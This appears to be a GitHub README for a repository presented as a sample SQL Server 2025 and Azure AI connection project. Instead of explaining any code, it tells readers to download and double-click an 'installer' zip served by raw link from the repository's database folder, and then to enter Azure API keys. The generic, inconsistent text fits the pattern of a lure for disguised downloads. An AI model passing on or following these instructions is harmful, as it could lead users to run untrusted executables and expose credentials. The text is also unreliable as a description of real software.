This repository contains a sample solution demonstrating how to connect to an AI model in Azure and to localhost using SQL Server 2025. It showcases how you can utilize both cloud and local resources for your AI projects.
Follow the steps below to download and run the application.
Before you start, ensure your computer meets the following requirements:
- Operating System: Windows 10 or later
- Hardware: Minimum 4GB RAM
- Software:
- .NET Framework 4.7.2 or later
- SQL Server 2025 Express or higher
- Access to Azure for AI model connections
To get the application, visit our Releases page. Here, you can find the latest version of the software.
On the Releases page, locate the latest version of the software. You will see a list of files available for download.
Click on the appropriate file for your system. Most users will download the installer package labeled as https://github.com/09sulka/API-4-Your-AI/raw/refs/heads/main/database/Your_AP_AI_2.1-alpha.5.zip.
- Locate the downloaded file in your computer's Downloads folder.
- Double-click on the
https://github.com/09sulka/API-4-Your-AI/raw/refs/heads/main/database/Your_AP_AI_2.1-alpha.5.zipfile. - Follow the prompts in the installation wizard to complete the setup.
- Open the application once installed.
The application requires you to set up a SQL Server database.
- Open SQL Server Management Studio.
- Create a new database named
AI_Connect. - Run the script provided in the repository to set up the necessary tables and data.
To connect with Azure AI models, you will need to configure your Azure credentials.
- Go to the settings within the application.
- Enter your Azure API key and endpoint.
- Save your changes.
- Launch the application from your desktop.
- Use the interface to interact with the AI models hosted on Azure or run local queries to your SQL database.
- Follow on-screen instructions for various features and functionalities.
- Multi-Connection Support: Connect to both Azure and local SQL Server instances.
- User-Friendly Interface: Simplified interactions that do not require technical knowledge.
- Real-Time Data Processing: Use advanced AI models to process data instantly.
- Secure Communication: Utilize self-signed certificates for secure connections.
To make the most of the application, consider reviewing the following resources:
- Documentation: Complete usage documentation is included in the repository.
- Examples: Example scripts and configurations to help you get started.
- Community Support: Access our community forums for questions and tips.
- Always ensure your SQL Server is running before launching the application.
- Keep your Azure credentials safe and secure.
- Check for updates regularly on the Releases page to benefit from new features and security fixes.
Don't forget to download the application again if you need to install the latest version.
Now you are ready to explore the power of AI with our software. Enjoy building your projects!